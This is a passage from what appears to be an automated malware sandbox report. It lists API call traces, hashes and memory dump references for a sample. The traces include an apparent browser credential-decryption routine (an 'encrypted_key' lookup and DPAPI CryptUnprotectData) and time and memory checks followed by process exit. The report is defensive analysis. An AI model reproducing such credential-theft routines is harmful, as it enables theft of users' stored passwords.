                                            • Instruction Fuzzy Hash: CD21C8B6E04218A7CB14FB70EC46EED333E9B94300F40455EB656561D1EE78ABC8CB95
                                            APIs
                                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 024514A5
                                            • __aulldiv.LIBCMT ref: 024514BF
                                            • __aulldiv.LIBCMT ref: 024514CD
                                            • ExitProcess.KERNEL32 ref: 024514FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                            • String ID: @
                                            • API String ID: 3404098578-2766056989
                                            • Opcode ID: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                            • Instruction ID: 18516df1c6281785205b49b9221a0665ccc334cabd8a04a8e929b6104f7f5f64
                                            • Opcode Fuzzy Hash: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                            • Instruction Fuzzy Hash: 01016DB0D44308FEEF10DBD0CD89B9EBB79AB0070AF20844AEA09BA2C0D77495458B56
                                            APIs
                                            • memcmp.MSVCRT(?,0042124C,00000003), ref: 0245A7E4
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                            • memcmp.MSVCRT(?,004210FC,00000003), ref: 0245A839
                                            • memset.MSVCRT ref: 0245A872
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0245A8CB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memcmp$AllocLocallstrcpymemset
                                            • String ID: @
                                            • API String ID: 631489823-2766056989
                                            • Opcode ID: a0dfd0b00870158b78f1bd2e6a7999d260a6401e0527ae678fcebbd35b121d7e
                                            • Instruction ID: d92db8908ab24b0105d922302a7f964fdb120a6ba7a3dd5784e29a998cd9e7af
                                            • Opcode Fuzzy Hash: a0dfd0b00870158b78f1bd2e6a7999d260a6401e0527ae678fcebbd35b121d7e
                                            • Instruction Fuzzy Hash: 6F514C30A00268AFDB18EFA5CD99FED7772BF54304F00811DE9096B591EB74AA45CF51
                                            APIs
                                            • strtok_s.MSVCRT ref: 00410FE8
                                            • strtok_s.MSVCRT ref: 0041112D
                                              • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,009C9490,?,004210F4,?,00000000), ref: 0041AB3B
                                              • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strtok_s$lstrcpylstrlen
                                            • String ID:
                                            • API String ID: 348468850-0
                                            • Opcode ID: 77d8088bb27251dd49dfcd07a26e8087964298c25f1e83629a7bc62193e0fc7a
                                            • Instruction ID: 03db8a1056b7d3decc043d16849240f9eafe82692520a9407f7f8401fd2e2a69
                                            • Opcode Fuzzy Hash: 77d8088bb27251dd49dfcd07a26e8087964298c25f1e83629a7bc62193e0fc7a
                                            • Instruction Fuzzy Hash: EF515E75A0410AEFCB08CF54D595AEEBBB5FF48308F10805EE9029B361D734EA91CB95
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                              • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                              • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                              • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                              • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                              • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                              • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489
                                              • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                              • Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                              • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                              • Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                            • memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2
                                              • Part of subcall function 0040A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
                                              • Part of subcall function 0040A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
                                              • Part of subcall function 0040A2B0: memcpy.MSVCRT(?,?,?), ref: 0040A316
                                              • Part of subcall function 0040A2B0: LocalFree.KERNEL32(?), ref: 0040A323
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                            • String ID: $"encrypted_key":"$DPAPI
                                            • API String ID: 3731072634-738592651
                                            • Opcode ID: 670b58208e1ff2a3ebe60e827019e5f1f1af2f7c111c07866c18d1fd8af9f875
                                            • Instruction ID: 27b9d937d1eb2b37959d1b0821c640950517226354c316aa9f1795df4e4508dc
                                            • Opcode Fuzzy Hash: 670b58208e1ff2a3ebe60e827019e5f1f1af2f7c111c07866c18d1fd8af9f875
                                            • Instruction Fuzzy Hash: 323152B6D00209ABCF04DBD4DC45AEFB7B8BF58304F44456AE901B7281E7389A54CB6A
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CodeInfoPageValidmemset
                                            • String ID:
                                            • API String ID: 703783727-0
                                            • Opcode ID: df407eb42ed6ae19740f6001b4b28ec45f3a0947630176eabde2e48c15dd9d5f
                                            • Instruction ID: ae99f83a2daa1a268adb2822acf225323ba8d4f157788557a97b9432f083f559
                                            • Opcode Fuzzy Hash: df407eb42ed6ae19740f6001b4b28ec45f3a0947630176eabde2e48c15dd9d5f
                                            • Instruction Fuzzy Hash: 5C31C170F08291CBEB259F75C89837ABFA0AB46314F1485ABD891CF291C368C446CB52
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: dllmain_raw$dllmain_crt_dispatch
                                            • String ID:
                                            • API String ID: 3136044242-0
                                            • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                            • Instruction ID: a7f1cea617fda5a248391684b2ea28183e76af00ee6c77fe07156e9c35c9315a
                                            • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                            • Instruction Fuzzy Hash: F121857AD01215AEDBA29F5FCC8096F7A66EB95BA4F25411FE81C66310C7308D419FD0
                                            APIs
                                            • GetSystemTime.KERNEL32(004210F4,?,?,00416DB1,00000000,?,009C9490,?,004210F4,?,00000000,?), ref: 00416C0C
                                            • sscanf.NTDLL ref: 00416C39
                                            • SystemTimeToFileTime.KERNEL32(004210F4,00000000,?,?,?,?,?,?,?,?,?,?,?,009C9490,?,004210F4), ref: 00416C52
                                            • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,009C9490,?,004210F4), ref: 00416C60
                                            • ExitProcess.KERNEL32 ref: 00416C7A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: Time$System$File$ExitProcesssscanf
                                            • String ID:
                                            • API String ID: 2533653975-0
                                            • Opcode ID: 8f3d302021b633d499eebc2b75f511318c1b224c781d312d182f2b4f083543dc
                                            • Instruction ID: 1a92bae8d2aea180e7b918fcc5e881d349bf880cfa552010dcbd9d747ca2879d
                                            • Opcode Fuzzy Hash: 8f3d302021b633d499eebc2b75f511318c1b224c781d312d182f2b4f083543dc
                                            • Instruction Fuzzy Hash: 0321CD75D142089BCF14DFE4E9459EEB7BABF48300F04852EF506A3250EB349644CB69
                                            APIs
                                            • GetSystemTime.KERNEL32(?), ref: 02466E73
                                            • sscanf.NTDLL ref: 02466EA0
                                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02466EB9
                                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02466EC7
                                            • ExitProcess.KERNEL32 ref: 02466EE1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: Time$System$File$ExitProcesssscanf
                                            • String ID:
                                            • API String ID: 2533653975-0
                                            • Opcode ID: 6f773626f3441833338ad6a64aabe7637b4b1e18bec63e878425460b9ebe86da
                                            • Instruction ID: 9eb4606ce9290aa4c44e78782f22204d4d80e8ca620e0e4c843c52d4b1bdbcdd
                                            • Opcode Fuzzy Hash: 6f773626f3441833338ad6a64aabe7637b4b1e18bec63e878425460b9ebe86da
                                            • Instruction Fuzzy Hash: 8321DCB5D14219ABCF14DFE4E8499EEB7BAFF48300F04852EE516E3250EB349604CB65
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417FC7
                                            • HeapAlloc.KERNEL32(00000000), ref: 00417FCE
                                            • RegOpenKeyExA.ADVAPI32(80000002,009CCA20,00000000,00020119,?), ref: 00417FEE
                                            • RegQueryValueExA.ADVAPI32(?,009D0DC8,00000000,00000000,000000FF,000000FF), ref: 0041800F
                                            • RegCloseKey.ADVAPI32(?), ref: 00418022
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3466090806-0
                                            • Opcode ID: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                            • Instruction ID: 7366865410052b2090c980cb0782fc53e6cc971cacc9a0cbb18d91746b71e1a2
                                            • Opcode Fuzzy Hash: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                            • Instruction Fuzzy Hash: 981151B1E45209EBD700CF94DD45FBFBBB9EB48B11F10421AF615A7280E77959048BA2
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0246822E
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02468235
                                            • RegOpenKeyExA.ADVAPI32(80000002,006D6BD4,00000000,00020119,?), ref: 02468255
                                            • RegQueryValueExA.ADVAPI32(?,006D6EEC,00000000,00000000,000000FF,000000FF), ref: 02468276
                                            • RegCloseKey.ADVAPI32(?), ref: 02468289
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3225020163-0
                                            • Opcode ID: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                            • Instruction ID: 001bf3425b4c462425007660bf483e539f312526bc633b969f9c8ab1b4f1c4b0
                                            • Opcode Fuzzy Hash: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                            • Instruction Fuzzy Hash: 45114CB1E4560AABDB00CFD4DD49FBBBBB9EB44B11F10421AF615AA280D7745904CBA2
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02467B2B
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02467B32
                                            • RegOpenKeyExA.ADVAPI32(80000002,006D6D98,00000000,00020119,02467AB0), ref: 02467B52
                                            • RegQueryValueExA.ADVAPI32(02467AB0,00420AB4,00000000,00000000,?,000000FF), ref: 02467B71
                                            • RegCloseKey.ADVAPI32(02467AB0), ref: 02467B7B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3225020163-0
                                            • Opcode ID: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                            • Instruction ID: c3851170b4f0290579ec24fa623980467ddb013b9d7f2a1be4bf00bcd93e3a21
                                            • Opcode Fuzzy Hash: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                            • Instruction Fuzzy Hash: 2C01FFB5E45309BBDB00DBE4DC49FAEB779EF44705F10459AF605A6280E774AA00CB91
                                            APIs
                                            • StrStrA.SHLWAPI(009D0600,00000000,00000000,?,00409F71,00000000,009D0600,00000000), ref: 004193FC
                                            • lstrcpyn.KERNEL32(006D7580,009D0600,009D0600,?,00409F71,00000000,009D0600), ref: 00419420
                                            • lstrlenA.KERNEL32(00000000,?,00409F71,00000000,009D0600), ref: 00419437
                                            • wsprintfA.USER32 ref: 00419457
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: lstrcpynlstrlenwsprintf
                                            • String ID: %s%s
                                            • API String ID: 1206339513-3252725368
                                            • Opcode ID: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                            • Instruction ID: 36a1aade9beab669742e698a5986ef2a8e6d9b7fa0e45cca69d8a80143706e49
                                            • Opcode Fuzzy Hash: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                            • Instruction Fuzzy Hash: 9B011E75A18108FFCB04DFA8DD54EAE7B79EF48304F108249F9098B340EB31AA40DB96
                                            APIs
                                            • StrStrA.SHLWAPI(\nm,00000000,00000000,?,0245A1D8,00000000,006D6E5C,00000000), ref: 02469663
                                            • lstrcpyn.KERNEL32(006D7580,\nm,\nm,?,0245A1D8,00000000,006D6E5C), ref: 02469687
                                            • lstrlen.KERNEL32(00000000,?,0245A1D8,00000000,006D6E5C), ref: 0246969E
                                            • wsprintfA.USER32 ref: 024696BE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: lstrcpynlstrlenwsprintf
                                            • String ID: \nm
                                            • API String ID: 1206339513-1385846026
                                            • Opcode ID: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                            • Instruction ID: 01660fe027666f272699ad7cc90f4303043f554876858b90f8eb866976d28c1a
                                            • Opcode Fuzzy Hash: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                            • Instruction Fuzzy Hash: 77011E75904208FFCB04DFA8DD48EAE7B79EF48304F108249F9098B340EB31AA40CB96
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                            • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                            • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3466090806-0
                                            • Opcode ID: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                            • Instruction ID: b0bfc99e0bb5f41d030d85d97ebb5ad9faa7414484ca5a523084a8432581bb26
                                            • Opcode Fuzzy Hash: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                            • Instruction Fuzzy Hash: D1013179E45209BFDB00DFD0DC49FAE7779EB48701F00419AFA05A7280E770AA008B91
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0245151B
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02451522
                                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0245153E
                                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 0245155C
                                            • RegCloseKey.ADVAPI32(?), ref: 02451566
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3225020163-0
                                            • Opcode ID: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                            • Instruction ID: 011ac6d45b34f752a9a1b004831281654ff03ce0616b51169d100f525f444af0
                                            • Opcode Fuzzy Hash: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                            • Instruction Fuzzy Hash: E101E179E45209BFDB04DFD4DC49FAE7779EB48701F10419AFA0597280E770AA00CB91
                                            APIs
                                            • __getptd.LIBCMT ref: 0041CA7E
                                              • Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
                                              • Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0
                                            • __getptd.LIBCMT ref: 0041CA95
                                            • __amsg_exit.LIBCMT ref: 0041CAA3
                                            • __lock.LIBCMT ref: 0041CAB3
                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0041CAC7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                            • String ID:
                                            • API String ID: 938513278-0
                                            • Opcode ID: 8e15bae909d06919cb4135276c74b5d3530aaf41c11ecb0caa68e2a981b89e64
                                            • Instruction ID: c5a7914bfd81a4edf64c409ce704b1973edb92a02c079c255f399551119664c9
                                            • Opcode Fuzzy Hash: 8e15bae909d06919cb4135276c74b5d3530aaf41c11ecb0caa68e2a981b89e64
                                            • Instruction Fuzzy Hash: D0F06231A803189BD622FBA95C867DE33A0AF40758F50014FE405562D2CB7C59C186DE
                                            APIs
                                            • __getptd.LIBCMT ref: 0246CCE5
                                              • Part of subcall function 0246C507: __getptd_noexit.LIBCMT ref: 0246C50A
                                              • Part of subcall function 0246C507: __amsg_exit.LIBCMT ref: 0246C517
                                            • __getptd.LIBCMT ref: 0246CCFC
                                            • __amsg_exit.LIBCMT ref: 0246CD0A
                                            • __lock.LIBCMT ref: 0246CD1A
                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0246CD2E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                            • String ID:
                                            • API String ID: 938513278-0
                                            • Opcode ID: 2c0ddcac0e8e8bcdfdf9741ae957a452135e3d1b714c0b19c8a1c6a09a33287e
                                            • Instruction ID: 235d0f6dd63c14b167ca6b0c02c68a0cc9146237bfeb1c5394752e12b71b680a
                                            • Opcode Fuzzy Hash: 2c0ddcac0e8e8bcdfdf9741ae957a452135e3d1b714c0b19c8a1c6a09a33287e
                                            • Instruction Fuzzy Hash: 45F09632A003109AD720FB69D88DB7E3B919F0075CF11410FD480EA6D0CB245541CE9B
                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416903
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 004169C6
                                            • ExitProcess.KERNEL32 ref: 004169F5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                            • String ID: <
                                            • API String ID: 1148417306-4251816714
                                            • Opcode ID: 80adf956ea99f7686bf73ed2305a0c7c355c3d8c509fc3f8e2274e2124ba97dc
                                            • Instruction ID: 69e214fcc2f82cbe4d830bf51364f862e1744f727ac50a07542482e63681b1c7
                                            • Opcode Fuzzy Hash: 80adf956ea99f7686bf73ed2305a0c7c355c3d8c509fc3f8e2274e2124ba97dc
                                            • Instruction Fuzzy Hash: 82313AB1902218ABDB14EB91DC92FDEB779AF08314F40418EF20566191DF787B88CF69
                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 02466B6A
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 02466C2D
                                            • ExitProcess.KERNEL32 ref: 02466C5C
                                            Strings
                                            Memory Dump Source
